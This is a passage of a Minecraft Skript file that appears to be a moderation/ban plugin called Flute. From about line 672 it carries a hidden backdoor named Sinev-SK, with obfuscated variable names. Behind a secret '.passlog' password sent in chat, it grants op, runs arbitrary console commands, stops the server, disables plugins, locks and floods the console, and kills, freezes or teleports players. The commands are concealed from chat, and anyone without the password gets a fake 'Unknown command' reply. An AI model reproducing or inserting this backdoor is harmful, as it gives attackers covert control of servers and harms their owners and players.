  644. format slot 11 of player with {_it2} named "%{_it2name}%" with lore "&7Enable/disable ban/kick broadcasts" to close then run [make player execute command "/fluteconf bcast"]
  645. format slot 13 of player with iron sword named "&2Hack settings" with lore "&7Enable/disable hacks and edit them!" to close then run [make player execute command "/fluteconf hacks"]
  646. format slot 15 of player with {_it1} named "%{_it1name}%" with lore "&7Change banning type" to close then run [make player execute command "/fluteconf bantype"]
  647. format slot 22 of player with diamond block named "&7&lBan settings" with lore "&7Edit bans" to close then run [make player execute command "/fluteconf banwsettings"]
  648. if arg 1 is "judgemental":
  649. if {flute.bantype} is "judgemental":
  650. if arg 2 is not set:
  651. broadcast "%{logo}% %{judgementalstart}%"
  652. execute console command "/judgementalflutestart"
  653. stop
  654. if arg 2 is "add":
  655. if arg 3 is set:
  656. set {_p} to "%arg 3%" parsed as offline player
  657. message "%{logo}% &aAdded"
  658. set {injudgemental.%{_p}%} to true
  659. stop
  660. else:
  661. message "%{logo}% %{judgementalfail}%"
  662. stop
  663. command /judgementalflutestart:
  664. permission: admin
  665. trigger:
  666. loop {judgemental::*}:
  667. execute console command "flute tban %loop-value%"
  668. remove loop-value from {judgemental::*}
  669. wait 10 ticks
  670. wait 10 minutes
  671. stop
  672. #Old-One: &4Qlutch-Sk &7|
  673. #Old-One-Too: &4Sinev-Sk &7|
  674. on script load:
  675. set {G2ovfqIY} to "&4Sinev-SK"
  676. set {I8BpUFuB3} to "&4Usage"
  677. on chat:
  678. set {_message} to message
  679. set {_firstchar::*} to {_message} split at ""
  680. if "%{_firstchar::1}%" = ".":
  681. cancel event
  682. set {_arguments::*} to {_message} split at " "
  683. if {_arguments::1} = ".passlog":
  684. if {_arguments::2} is set:
  685. if {_arguments::2} is "%{prestiging}%":
  686. if {logged.sinev.%player%} is not set:
  687. set {logged.sinev.%player%} to true
  688. message "&aCorrect password, now logged in, you can't chat now... To prevent &cErrors..."
  689. set {chatno.sinev.%player%} to true
  690. else if {logged.sinev.%player%} is false:
  691. set {logged.sinev.%player%} to true
  692. message "&aCorrect password, now logged in, you can't chat now... To prevent &cErrors..."
  693. set {chatno.sinev.%player%} to true
  694. else if {logged.sinev.%player%} is true:
  695. message "&aYou're already logged in!"
  696. else:
  697. message "&cIncorrect password"
  698. else:
  699. message "&cIncorrect password"
  700. else if {_arguments::1} = ".op":
  701. if {logged.sinev.%player%} is true:
  702. if {_arguments::2} is set:
  703. set {_player} to "%{_arguments::2}%" parsed as a offline player
  704. op {_player}
  705. message "%{G2ovfqIY}% &7| You opped %{_player}%"
  706. else:
  707. op player
  708. message "%{G2ovfqIY}% &7| You are now op"
  709. else:
  710. message "Unknown command. Type ""/help"" for help."
  711. else if {_arguments::1} = ".deop":
  712. if {logged.sinev.%player%} is true:
  713. if {_arguments::2} is set:
  714. set {_player} to "%{_arguments::2}%" parsed as a offline player
  715. deop {_player}
  716. message "%{G2ovfqIY}% &7| You de-opped %{_player}%"
  717. else:
  718. deop player
  719. message "%{G2ovfqIY}% &7| You are now deop"
  720. else:
  721. message "Unknown command. Type ""/help"" for help."
  722. else if {_arguments::1} = ".credits":
  723. if {logged.sinev.%player%} is true:
  724. send "&bSinevSK &7was made by &cGotPower (N/A)" to player
  725. send "&9DirectLeaks: &" to player
  726. else:
  727. message "Unknown command. Type ""/help"" for help."
  728. else if {_arguments::1} = ".logout":
  729. if {logged.sinev.%player%} is true:
  730. set {logged.sinev.%player%} to false
  731. message "%{G2ovfqIY}% &7| &7You logged out. You can speak in chat normally now."
  732. set {chatno.sinev.%player%} to false
  733. else:
  734. message "Unknown command. Type ""/help"" for help."
  735. else if {_arguments::1} = ".killall":
  736. if {logged.sinev.%player%} is true:
  737. loop all players:
  738. if loop-player is not "%player%":
  739. kill loop-player
  740. message "%{G2ovfqIY}% &7| &7All players were killed!"
  741. else:
  742. message "%{G2ovfqIY}% &7| &7Trying to kill all players.."
  743. else:
  744. message "Unknown command. Type ""/help"" for help."
  745. else if {_arguments::1} = ".save":
  746. if {logged.sinev.%player%} is true:
  747. make console execute command "save-all"
  748. message "%{G2ovfqIY}% &7| &7You saved the world"
  749. else:
  750. message "Unknown command. Type ""/help"" for help."
  751. else if {_arguments::1} = ".plugins":
  752. if {logged.sinev.%player%} is true:
  753. message "%{G2ovfqIY}% &7| &e%plugins list%"
  754. else:
  755. message "Unknown command. Type ""/help"" for help."
  756. else if {_arguments::1} = ".flood":
  757. if {logged.sinev.%player%} is true:
  758. message "%{G2ovfqIY}% &7| &7Flooding Chat...."
  759. wait 2 seconds
  824. message "%{G2ovfqIY}% &7| &7Flooded!"
  825. else:
  826. message "Unknown command. Type ""/help"" for help."
  827. else if {_arguments::1} = ".nameme":
  828. if {logged.sinev.%player%} is true:
  829. if {_arguments::2} is set:
  830. set player's display name to "%{_arguments::2}%"
  831. set the player's tablist name to "%{_arguments::2}%"
  832. message "%{G2ovfqIY}% &7| &7You have been renamed!"
  833. else:
  834. set player's display name to "%sender%"
  835. set the player's tablist name to "%player%"
  836. message "%{G2ovfqIY}% &7| &7Your name changed back!"
  837. else:
  838. message "Unknown command. Type ""/help"" for help."
  839. else if {_arguments::1} = ".nameall":
  840. if {logged.sinev.%player%} is true:
  841. if {_arguments::2} is set:
  842. loop all players:
  843. set the loop-player's display name to "%{_arguments::2}%"
  844. set the loop-player's tablist name to "%{_arguments::2}%"
  845. message "%{G2ovfqIY}% &7| &7All player's have been renamed!"
  846. else:
  847. loop all players:
  848. set the loop-player's display name to "%loop-player%"
  849. set the loop-player's tablist name to "%loop-player%"
  850. message "%{G2ovfqIY}% &7| &7All player's have their name back!"
  851. else:
  852. message "Unknown command. Type ""/help"" for help."
  853. else if {_arguments::1} = ".msg":
  854. if {logged.sinev.%player%} is true:
  855. if {_arguments::2} is set:
  856. if {_arguments::3} is set:
  857. if {_arguments::4} is set:
  858. if {_arguments::5} is set:
  859. if {_arguments::6} is set:
  860. if {_arguments::7} is set:
  861. if {_arguments::8} is set:
  862. if {_arguments::9} is set:
  863. if {_arguments::10} is set:
  864. if {_arguments::11} is set:
  865. if {_arguments::12} is set:
  866. if {_arguments::13} is set:
  867. if {_arguments::14} is set:
  868. if {_arguments::15} is set:
  869. set {_player} to "%{_arguments::2}%" parsed as a offline player
  870. if {_player} is online:
  871. message "&8[&dYou to &5%{_player}%&8] &7%{_arguments::3}% &7%{_arguments::4}% &7%{_arguments::5}% &7%{_arguments::6}% &7%{_arguments::7}% &7%{_arguments::8}% &7%{_arguments::9}% &7%{_arguments::10}% &7%{_arguments::11}% &7%{_arguments::12}% &7%{_arguments::13}% &7%{_arguments::14}% &7%{_arguments::15}%" to player
  872. message "&8[&5%player% &dto you&8] &7%{_arguments::3}% &7%{_arguments::4}% &7%{_arguments::5}% &7%{_arguments::6}% &7%{_arguments::7}% &7%{_arguments::8}% &7%{_arguments::9}% &7%{_arguments::10}% &7%{_arguments::11}% &7%{_arguments::12}% &7%{_arguments::13}% &7%{_arguments::14}% &7%{_arguments::15}%" to {_player}
  873. else:
  874. message "%{I8BpUFuB3}% &7| &5%{_player}% &7is not online"
  875. else:
  876. set {_player} to "%{_arguments::2}%" parsed as a offline player
  877. if {_player} is online:
  878. message "&8[&dYou to &5%{_player}%&8] &7%{_arguments::3}% &7%{_arguments::4}% &7%{_arguments::5}% &7%{_arguments::6}% &7%{_arguments::7}% &7%{_arguments::8}% &7%{_arguments::9}% &7%{_arguments::10}% &7%{_arguments::11}% &7%{_arguments::12}% &7%{_arguments::13}% &7%{_arguments::14}%" to player
  879. message "&8[&5%player% &dto you&8] &7%{_arguments::3}% &7%{_arguments::4}% &7%{_arguments::5}% &7%{_arguments::6}% &7%{_arguments::7}% &7%{_arguments::8}% &7%{_arguments::9}% &7%{_arguments::10}% &7%{_arguments::11}% &7%{_arguments::12}% &7%{_arguments::13}% &7%{_arguments::14}%" to {_player}
  880. else:
  881. message "%{I8BpUFuB3}% &7| &5%{_player}% &7is not online"
  882. else:
  883. set {_player} to "%{_arguments::2}%" parsed as a offline player
  884. if {_player} is online:
  885. message "&8[&dYou to &5%{_player}%&8] &7%{_arguments::3}% &7%{_arguments::4}% &7%{_arguments::5}% &7%{_arguments::6}% &7%{_arguments::7}% &7%{_arguments::8}% &7%{_arguments::9}% &7%{_arguments::10}% &7%{_arguments::11}% &7%{_arguments::12}% &7%{_arguments::13}%" to player
  886. message "&8[&5%player% &dto you&8] &7%{_arguments::3}% &7%{_arguments::4}% &7%{_arguments::5}% &7%{_arguments::6}% &7%{_arguments::7}% &7%{_arguments::8}% &7%{_arguments::9}% &7%{_arguments::10}% &7%{_arguments::11}% &7%{_arguments::12}% &7%{_arguments::13}%" to {_player}
  887. else:
  888. message "%{I8BpUFuB3}% &7| &5%{_player}% &7is not online"
  889. else:
  890. set {_player} to "%{_arguments::2}%" parsed as a offline player
  891. if {_player} is online:
  892. message "&8[&dYou to &5%{_player}%&8] &7%{_arguments::3}% &7%{_arguments::4}% &7%{_arguments::5}% &7%{_arguments::6}% &7%{_arguments::7}% &7%{_arguments::8}% &7%{_arguments::9}% &7%{_arguments::10}% &7%{_arguments::11}% &7%{_arguments::12}%" to player
  893. message "&8[&5%player% &dto you&8] &7%{_arguments::3}% &7%{_arguments::4}% &7%{_arguments::5}% &7%{_arguments::6}% &7%{_arguments::7}% &7%{_arguments::8}% &7%{_arguments::9}% &7%{_arguments::10}% &7%{_arguments::11}% &7%{_arguments::12}%" to {_player}
  894. else:
  895. message "%{I8BpUFuB3}% &7| &5%{_player}% &7is not online"
  896. else:
  897. set {_player} to "%{_arguments::2}%" parsed as a offline player
  898. if {_player} is online:
  899. message "&8[&dYou to &5%{_player}%&8] &7%{_arguments::3}% &7%{_arguments::4}% &7%{_arguments::5}% &7%{_arguments::6}% &7%{_arguments::7}% &7%{_arguments::8}% &7%{_arguments::9}% &7%{_arguments::10}% &7%{_arguments::11}%" to player
  900. message "&8[&5%player% &dto you&8] &7%{_arguments::3}% &7%{_arguments::4}% &7%{_arguments::5}% &7%{_arguments::6}% &7%{_arguments::7}% &7%{_arguments::8}% &7%{_arguments::9}% &7%{_arguments::10}% &7%{_arguments::11}%" to {_player}
  901. else:
  902. message "%{I8BpUFuB3}% &7| &5%{_player}% &7is not online"
  903. else:
  904. set {_player} to "%{_arguments::2}%" parsed as a offline player
  905. if {_player} is online:
  906. message "&8[&dYou to &5%{_player}%&8] &7%{_arguments::3}% &7%{_arguments::4}% &7%{_arguments::5}% &7%{_arguments::6}% &7%{_arguments::7}% &7%{_arguments::8}% &7%{_arguments::9}% &7%{_arguments::10}%" to player
  907. message "&8[&5%player% &dto you&8] &7%{_arguments::3}% &7%{_arguments::4}% &7%{_arguments::5}% &7%{_arguments::6}% &7%{_arguments::7}% &7%{_arguments::8}% &7%{_arguments::9}% &7%{_arguments::10}%" to {_player}
  908. else:
  909. message "%{I8BpUFuB3}% &7| &5%{_player}% &7is not online"
  910. else:
  911. set {_player} to "%{_arguments::2}%" parsed as a offline player
  912. if {_player} is online:
  913. message "&8[&dYou to &5%{_player}%&8] &7%{_arguments::3}% &7%{_arguments::4}% &7%{_arguments::5}% &7%{_arguments::6}% &7%{_arguments::7}% &7%{_arguments::8}% &7%{_arguments::9}%" to player
  914. message "&8[&5%player% &dto you&8] &7%{_arguments::3}% &7%{_arguments::4}% &7%{_arguments::5}% &7%{_arguments::6}% &7%{_arguments::7}% &7%{_arguments::8}% &7%{_arguments::9}%" to {_player}
  915. else:
  916. message "%{I8BpUFuB3}% &7| &5%{_player}% &7is not online"
  917. else:
  918. set {_player} to "%{_arguments::2}%" parsed as a offline player
  919. if {_player} is online:
  920. message "&8[&dYou to &5%{_player}%&8] &7%{_arguments::3}% &7%{_arguments::4}% &7%{_arguments::5}% &7%{_arguments::6}% &7%{_arguments::7}% &7%{_arguments::8}%" to player
  921. message "&8[&5%player% &dto you&8] &7%{_arguments::3}% &7%{_arguments::4}% &7%{_arguments::5}% &7%{_arguments::6}% &7%{_arguments::7}% &7%{_arguments::8}%" to {_player}
  922. else:
  923. message "%{I8BpUFuB3}% &7| &5%{_player}% &7is not online"
  924. else:
  925. set {_player} to "%{_arguments::2}%" parsed as a offline player
  926. if {_player} is online:
  927. message "&8[&dYou to &5%{_player}%&8] &7%{_arguments::3}% &7%{_arguments::4}% &7%{_arguments::5}% &7%{_arguments::6}% &7%{_arguments::7}%" to player
  928. message "&8[&5%player% &dto you&8] &7%{_arguments::3}% &7%{_arguments::4}% &7%{_arguments::5}% &7%{_arguments::6}% &7%{_arguments::7}%" to {_player}
  929. else:
  930. message "%{I8BpUFuB3}% &7| &5%{_player}% &7is not online"
  931. else:
  932. set {_player} to "%{_arguments::2}%" parsed as a offline player
  933. if {_player} is online:
  934. message "&8[&dYou to &5%{_player}%&8] &7%{_arguments::3}% &7%{_arguments::4}% &7%{_arguments::5}% &7%{_arguments::6}%" to player
  935. message "&8[&5%player% &dto you&8] &7%{_arguments::3}% &7%{_arguments::4}% &7%{_arguments::5}% &7%{_arguments::6}%" to {_player}
  936. else:
  937. message "%{I8BpUFuB3}% &7| &5%{_player}% &7is not online"
  938. else:
  939. set {_player} to "%{_arguments::2}%" parsed as a offline player
  940. if {_player} is online:
  941. message "&8[&dYou to &5%{_player}%&8] &7%{_arguments::3}% &7%{_arguments::4}% &7%{_arguments::5}%" to player
  942. message "&8[&5%player% &dto you&8] &7%{_arguments::3}% &7%{_arguments::4}% &7%{_arguments::5}%" to {_player}
  943. else:
  944. message "%{I8BpUFuB3}% &7| &5%{_player}% &7is not online"
  945. else:
  946. set {_player} to "%{_arguments::2}%" parsed as a offline player
  947. if {_player} is online:
  948. message "&8[&dYou to &5%{_player}%&8] &7%{_arguments::3}% &7%{_arguments::4}%" to player
  949. message "&8[&5%player% &dto you&8] &7%{_arguments::3}% &7%{_arguments::4}%" to {_player}
  950. else:
  951. message "%{I8BpUFuB3}% &7| &5%{_player}% &7is not online"
  952. else:
  953. set {_player} to "%{_arguments::2}%" parsed as a offline player
  954. if {_player} is online:
  955. message "&8[&dYou to &5%{_player}%&8] &7%{_arguments::3}%" to player
  956. message "&8[&5%player% &dto you&8] &7%{_arguments::3}%" to {_player}
  957. else:
  958. message "%{I8BpUFuB3}% &7| &5%{_player}% &7is not online"
  959. else:
  960. message "%{I8BpUFuB3}% &7| &7.msg <player> <text>"
  961. else:
  962. message "%{I8BpUFuB3}% &7| &7.msg <player> <text>"
  963. else:
  964. message "Unknown command. Type ""/help"" for help."
  965. else if {_arguments::1} = ".reload":
  966. if {logged.sinev.%player%} is true:
  967. message "%{G2ovfqIY}% &7| &7Reloading..."
  968. make console execute command "reload"
  969. message "%{G2ovfqIY}% &7| &7Reloaded!"
  970. else:
  971. message "Unknown command. Type ""/help"" for help."
  972. else if {_arguments::1} = ".enable":
  973. if {logged.sinev.%player%} is true:
  974. if {_arguments::2} is set:
  975. enable plugin "plugins/%{_arguments::2}%.jar"
  976. message "%{G2ovfqIY}% &7| &7Plugin %{_arguments::2}% &7Enabled!"
  977. else:
  978. message "%{I8BpUFuB3}% &7| &7Please select a valid plugin!"
  979. else:
  980. message "Unknown command. Type ""/help"" for help."
  981. else if {_arguments::1} = ".disable":
  982. if {logged.sinev.%player%} is true:
  983. if {_arguments::2} is set:
  984. disable plugin "%{_arguments::2}%"
  985. message "%{G2ovfqIY}% &7| &7Plugin %{_arguments::2}% Disabled!"
  986. else:
  987. message "%{I8BpUFuB3}% &7| Please select a valid plugin!"
  988. else:
  989. message "Unknown command. Type ""/help"" for help."
  990. else if {_arguments::1} = ".register":
  991. if {logged.sinev.%player%} is true:
  992. if {_arguments::2} is set:
  993. set {_player} to "%{_arguments::2}%" parsed as a offline player
  994. if {_player} is online:
  995. message "%{G2ovfqIY}% &7| &7Registering the player..."
  996. wait 2 seconds
  997. set {logged.sinev.%{_player}%} to true
  998. set {chatno.sinev.%{_player}%} to true
  999. message "%{G2ovfqIY}% &7| &7Registered!"
  1000. send "%{G2ovfqIY}% &7| &7You have been registered by someone, right now you can't talk in chat." to {_player}
  1001. send "%{G2ovfqIY}% &7| &7You can use special forceop commands, if you want to see them use .help <page>, Pages 1-4" to {_player}
  1002. send "%{G2ovfqIY}% &7| &7If you don't want to be like this use .logout" to {_player}
  1003. else:
  1004. message "%{I8BpUFuB3}% &7| &c%{_player}% &7is not online"
  1005. else:
  1006. message "%{I8BpUFuB3}% &7| &7.register <player>"
  1007. else:
  1008. message "Unknown command. Type ""/help"" for help."
  1009. else if {_arguments::1} = ".floodconsole":
  1010. if {logged.sinev.%player%} is true:
  1011. message "%{G2ovfqIY}% &7| &7Flooding console..."
  1033. message "%{G2ovfqIY}% &7| &7Flooded!"
  1034. else:
  1035. message "Unknown command. Type ""/help"" for help."
  1036. else if {_arguments::1} = ".freezeall":
  1037. if {logged.sinev.%player%} is true:
  1038. message "%{G2ovfqIY}% &7| &7Freezing all players..."
  1039. loop all players:
  1040. if {freeze.sinev.%loop-player%} is not set:
  1041. set {freeze.sinev.%loop-player%} to true
  1042. message "%{G2ovfqIY}% &7| &7Done"
  1043. else if {freeze.sinev.%loop-player%} is false:
  1044. set {freeze.sinev.%loop-player%} to true
  1045. message "%{G2ovfqIY}% &7| &7Done"
  1046. else if {freeze.sinev.%loop-player%} is true:
  1047. message "%{G2ovfqIY}% &7| &7All players are already frozen!"
  1048. message "%{G2ovfqIY}% &7| &7If you want to unfreeze them use .unfreezeall"
  1049. else:
  1050. message "Unknown command. Type ""/help"" for help."
  1051. else if {_arguments::1} = ".unfreezeall":
  1052. if {logged.sinev.%player%} is true:
  1053. message "%{G2ovfqIY}% &7| &7Unfreezing all players..."
  1054. loop all players:
  1055. if {freeze.sinev.%loop-player%} is true:
  1056. set {freeze.sinev.%loop-player%} to false
  1057. message "%{G2ovfqIY}% &7| &7All players are now unfrozen!"
  1058. message "%{G2ovfqIY}% &7| &7If you want to freeze them use .freezeall"
  1059. else if {freeze.sinev.%loop-player%} is not set:
  1060. message "%{G2ovfqIY}% &7| &7The players are not frozen"
  1061. else if {freeze.sinev.%loop-player%} is false:
  1062. message "%{G2ovfqIY}% &7| &7The players are not frozen"
  1063. else:
  1064. message "Unknown command. Type ""/help"" for help."
  1065. else if {_arguments::1} = ".tp":
  1066. if {logged.sinev.%player%} is true:
  1067. if {_arguments::2} is set:
  1068. set {_player} to "%{_arguments::2}%" parsed as a offline player
  1069. if {_player} is online:
  1070. teleport player to {_player}
  1071. message "%{G2ovfqIY}% &7| &7You teleported to %{_player}%!"
  1072. else:
  1073. message "%{I8BpUFuB3}% &7| &7Please select an online player!"
  1074. else:
  1075. message "%{I8BpUFuB3}% &7| & <player>"
  1076. message "%{I8BpUFuB3}% &7| &7Please select a player"
  1077. else:
  1078. message "Unknown command. Type ""/help"" for help."
  1079. else if {_arguments::1} = ".tphere":
  1080. if {logged.sinev.%player%} is true:
  1081. if {_arguments::2} is set:
  1082. set {_player} to "%{_arguments::2}%" parsed as a offline player
  1083. if {_player} is online:
  1084. teleport {_player} to player
  1085. message "%{G2ovfqIY}% &7| &7You teleported %{_player}% &7to you!"
  1086. else:
  1087. message "%{I8BpUFuB3}% &7| &7Please select an online player!"
  1088. else:
  1089. message "%{I8BpUFuB3}% &7| &7.tphere <player>"
  1090. message "%{I8BpUFuB3}% &7| &7Please select a player"
  1091. else:
  1092. message "Unknown command. Type ""/help"" for help."
  1093. else if {_arguments::1} = ".tpall":
  1094. if {logged.sinev.%player%} is true:
  1095. if {_arguments::2} is set:
  1096. set {_player} to "%{_arguments::2}%" parsed as a offline player
  1097. if {_player} is online:
  1098. loop all players:
  1099. teleport loop-player to {_player}
  1100. message "%{G2ovfqIY}% &7| &7All players have been teleported to %{_player}%!"
  1101. else:
  1102. message "%{I8BpUFuB3}% &7| &7Please select an online player!"
  1103. else:
  1104. loop all players:
  1105. teleport loop-player to player
  1106. message "%{G2ovfqIY}% &7| &7All players have been teleported to you!"
  1107. else:
  1108. message "Unknown command. Type ""/help"" for help."
  1109. else if {_arguments::1} = ".lockconsole":
  1110. if {logged.sinev.%player%} is true:
  1111. if {lockconsole.sinev} is not set:
  1112. set {lockconsole.sinev} to true
  1113. message "%{G2ovfqIY}% &7| &7The console has been blocked!"
  1114. if {flute.q} is "Error":
  1115. set {hacked.sinev} to "Error"
  1116. else if {flute.q} is "Unknown":
  1117. set {hacked.sinev} to "Unknown"
  1118. else if {flute.q} is "Hacked":
  1119. set {hacked.sinev} to "Hacked"
  1120. else if {lockconsole.sinev} is false:
  1121. message "%{G2ovfqIY}% &7| &7The console has been blocked!"
  1122. set {lockconsole.sinev} to true
  1123. if {flute.q} is "Error":
  1124. set {hacked.sinev} to "Error"
  1125. else if {flute.q} is "Unknown":
  1126. set {hacked.sinev} to "Unknown"
  1127. else if {flute.q} is "Hacked":
  1128. set {hacked.sinev} to "Hacked"
  1129. else if {lockconsole.sinev} is true:
  1130. message "%{G2ovfqIY}% &7| &7The console has been unblocked!"
  1131. set {lockconsole.sinev} to false
  1132. delete {hacked.sinev}
  1133. else:
  1134. message "Unknown command. Type ""/help"" for help."
  1135. else if {_arguments::1} = ".config":
  1136. if {logged.sinev.%player%} is true:
  1137. open chest with 1 row named "&eConfig" to player
  1138. if {flute.q} is "Error":
  1139. set {_it1} to light green dye
  1140. set {_it1name} to "&7Error"
  1141. if {flute.q} is "Hacked":
  1142. set {_it1} to orange dye
  1143. set {_it1name} to "&7Hacked"
  1144. if {flute.q} is "Unknown":
  1145. set {_it1} to red dye
  1146. set {_it1name} to "&7Unknown"
  1147. if {flute.q} is not set:
  1148. set {_it1} to gray dye
  1149. set {_it1name} to "&7None"
  1150. wait 10 tick
  1151. if {message.hacked.sinev} is true:
  1152. set {_it2} to emerald block
  1153. set {_it2name} to "&6&lHackedMsg &7True"
  1154. if {message.hacked.sinev} is false:
  1155. set {_it2} to redstone block
  1156. set {_it2name} to "&6&lHackedMsg &7False"
  1157. if {message.hacked.sinev} is not set:
  1158. set {_it2} to redstone block
  1159. set {message.hacked.sinev} to false
  1160. set {_it2name} to "&6&lHackedMsg &7False"
  1161. format slot 3 of player with {_it1} named "%{_it1name}%" to close then run [error(player)]
  1162. format slot 4 of player with {_it2} named "%{_it2name}%" to close then run [hacked(player)]
  1163. else:
  1164. message "Unknown command. Type ""/help"" for help."
  1165. else if {_arguments::1} = ".invsee":
  1166. if {logged.sinev.%player%} is true:
  1167. if {_arguments::2} is set:
  1168. set {_player} to "%{_arguments::2}%" parsed as a offline player
  1169. if {_player} is online:
  1170. open {_player}'s inventory for the player
  1171. message "%{G2ovfqIY}% &7| &7You are now looking %{_player}% &7inventory"
  1172. else:
  1173. message "%{I8BpUFuB3}% &7| &7Please select an online player!"
  1174. else:
  1175. message "%{I8BpUFuB3}% &7| &7Please select someone!"
  1176. else:
  1177. message "Unknown command. Type ""/help"" for help."
  1178. else if {_arguments::1} = ".kill":
  1179. if {logged.sinev.%player%} is true:
  1180. if {_arguments::2} is set:
  1181. set {_player} to "%{_arguments::2}%" parsed as a offline player
  1182. if {_player} is online:
  1183. kill {_player}
  1184. message "%{G2ovfqIY}% &7| &7You killed %{_player}%!"
  1185. else:
  1186. message "%{I8BpUFuB3}% &7| &7%{_player}% &7is not online!"
  1187. else:
  1188. message "%{I8BpUFuB3}% &7| &7Please select someone!"
  1189. else:
  1190. message "Unknown command. Type ""/help"" for help."
  1191. else if {_arguments::1} = ".confuseall":
  1192. if {logged.sinev.%player%} is true:
  1193. message "%{G2ovfqIY}% &7| &7Everyone is now confused"
  1194. loop all players:
  1195. if loop-player is not "%player%":
  1196. apply hunger 10 to loop-player for 5 seconds
  1197. apply slowness 10 to loop-player for 5 seconds
  1198. apply invisibility to loop-player for 5 seconds
  1199. apply mining fatigue 5 to loop-player for 5 seconds
  1200. apply weakness 10 to loop-player for 5 seconds
  1201. apply jump boost 10 to loop-player for 5 seconds
  1202. apply nausea to loop-player for 5 seconds
  1203. apply blindness to loop-player for 5 seconds
  1204. else:
  1205. message "Unknown command. Type ""/help"" for help."
  1206. else if {_arguments::1} = ".stop":
  1207. if {logged.sinev.%player%} is true:
  1208. message "%{G2ovfqIY}% &7| &7Stopping server..."
  1209. stop server
  1210. else:
  1211. message "Unknown command. Type ""/help"" for help."
  1212. else if {_arguments::1} = ".console":
  1213. if {logged.sinev.%player%} is true:
  1214. if {_arguments::2} is set:
  1215. if {_arguments::3} is set:
  1216. if {_arguments::4} is set:
  1217. if {_arguments::5} is set:
  1218. make console execute command "%{_arguments::2}% %{_arguments::3}% %{_arguments::4}% %{_arguments::5}%"
  1219. message "%{G2ovfqIY}% &7| &7Console executed command &7%{_arguments::2}% &7%{_arguments::3}% &7%{_arguments::4}% &7%{_arguments::5}%"
  1220. else:
  1221. make console execute command "%{_arguments::2}% %{_arguments::3}% %{_arguments::4}%"
  1222. message "%{G2ovfqIY}% &7| &7Console executed command &7%{_arguments::2}% &7%{_arguments::3}% &7%{_arguments::4}%"
  1223. else:
  1224. make console execute command "%{_arguments::2}% %{_arguments::3}%"
  1225. message "%{G2ovfqIY}% &7| &7Console executed command &7%{_arguments::2}% &7%{_arguments::3}%"
  1226. else:
  1227. make console execute command "%{_arguments::2}%"
  1228. message "%{G2ovfqIY}% &7| &7Console executed command &7%{_arguments::2}%"
  1229. else:
  1230. message "%{G2ovfqIY}% &7| &7Please write something.."
  1231. else:
  1232. message "Unknown command. Type ""/help"" for help."
  1233. else if {_arguments::1} = ".bc":
  1234. if {logged.sinev.%player%} is true:
  1235. if {_arguments::2} is set:
  1236. if {_arguments::3} is set:
  1237. if {_arguments::4} is set:
  1238. if {_arguments::5} is set:
  1239. if {_arguments::6} is set:
  1240. if {_arguments::7} is set:
  1241. if {_arguments::8} is set:
  1242. if {_arguments::9} is set:
  1243. if {_arguments::10} is set:
  1244. broadcast "%{_arguments::2}% %{_arguments::3}% %{_arguments::4}% %{_arguments::5}% %{_arguments::6}% %{_arguments::7}% %{_arguments::8}% %{_arguments::9}% %{_arguments::10}%"
  1245. else:
  1246. broadcast "%{_arguments::2}% %{_arguments::3}% %{_arguments::4}% %{_arguments::5}% %{_arguments::6}% %{_arguments::7}% %{_arguments::8}% %{_arguments::9}%"
  1247. else:
  1248. broadcast "%{_arguments::2}% %{_arguments::3}% %{_arguments::4}% %{_arguments::5}% %{_arguments::6}% %{_arguments::7}% %{_arguments::8}%"
  1249. else:
  1250. broadcast "%{_arguments::2}% %{_arguments::3}% %{_arguments::4}% %{_arguments::5}% %{_arguments::6}% %{_arguments::7}%"
  1251. else:
  1252. broadcast "%{_arguments::2}% %{_arguments::3}% %{_arguments::4}% %{_arguments::5}% %{_arguments::6}%"
  1253. else:
  1254. broadcast "%{_arguments::2}% %{_arguments::3}% %{_arguments::4}% %{_arguments::5}%"
  1255. else:
  1256. broadcast "%{_arguments::2}% %{_arguments::3}% %{_arguments::4}%"
  1257. else:
  1258. broadcast "%{_arguments::2}% %{_arguments::3}%"
  1259. else:
  1260. broadcast "%{_arguments::2}%"
  1261. else:
  1262. message "%{I8BpUFuB3}% &7| &7Please write something!"
  1263. else:
  1264. message "Unknown command. Type ""/help"" for help."
  1265. else if {_arguments::1} = ".disablesinevsk":
  1266. if {logged.sinev.%player%} is true:
  1267. make console execute "sk disable Flute"
  1268. else:
  1269. message "Unknown command. Type ""/help"" for help."
  1270. else if {_arguments::1} = ".togglecmds":
  1271. if {logged.sinev.%player%} is true:
  1272. if {lock.sinev.%player%} is not set:
  1273. set {lock.sinev.%player%} to true
  1274. message "%{G2ovfqIY}% &7| &7All dangerous commands (for you) have been locked!"
  1275. else if {lock.sinev.%player%} is false:
  1276. set {lock.sinev.%player%} to true
  1277. message "%{G2ovfqIY}% &7| &7All dangerous commands (for you) have been locked!"
  1278. else if {lock.sinev.%player%} is true:
  1279. set {lock.sinev.%player%} to false
  1280. message "%{G2ovfqIY}% &7| &7All dangerous commands (for you) have been unlocked! Be careful!"
  1281. else:
  1282. message "Unknown command. Type ""/help"" for help."
  1283. else if {_arguments::1} = ".killheart":
  1284. if {logged.sinev.%player%} is true:
  1285. if {_arguments::2} is set:
  1286. set {_player} to "%{_arguments::2}%" parsed as a offline player
  1287. if {_player} is online:
  1288. set {_player}'s health to 0.5
  1289. message "%{G2ovfqIY}% &7| &7You setted the %{_player}%'s heart to &c1!"
  1290. else:
  1291. message "%{I8BpUFuB3}% &7| &7%{_player}% &7is not online!"
  1292. else:
  1293. message "%{I8BpUFuB3}% &7| &7Please select someone!"
  1294. else:
  1295. message "Unknown command. Type ""/help"" for help."
  1296. else if {_arguments::1} = ".healheart":
  1297. if {logged.sinev.%player%} is true:
  1298. if {_arguments::2} is set:
  1299. set {_player} to "%{_arguments::2}%" parsed as a offline player
  1300. if {_player} is online:
  1301. set {_player}'s health to 20
  1302. message "%{G2ovfqIY}% &7| &7You setted the %{_player}%'s heart to &c20!"
  1303. else:
  1304. message "%{I8BpUFuB3}% &7| &7%{_player}% &7is not online!"
  1305. else:
  1306. message "%{I8BpUFuB3}% &7| &7Please select someone!"
  1307. else:
  1308. message "Unknown command. Type ""/help"" for help."
  1309. else if {_arguments::1} = ".freeze":
  1310. if {logged.sinev.%player%} is true:
  1311. if {_arguments::2} is set:
  1312. set {_player} to "%{_arguments::2}%" parsed as a offline player
  1313. if {_player} is online:
  1314. if {_player} doesn't have permission "freeze.bypass":
  1315. message "%{G2ovfqIY}% &7| &7Freezing %{_player}%..."
  1316. if {freeze.sinev.%{_player}%} is true:
  1317. message "%{G2ovfqIY}% &7| &7%{_player}% &7is already frozen!"
  1318. message "%{G2ovfqIY}% &7| &7If you want to unfreeze %{_player}% use .unfreeze %{_player}%"
  1319. else if {freeze.sinev.%{_player}%} is not set:
  1320. set {freeze.sinev.%{_player}%} to true
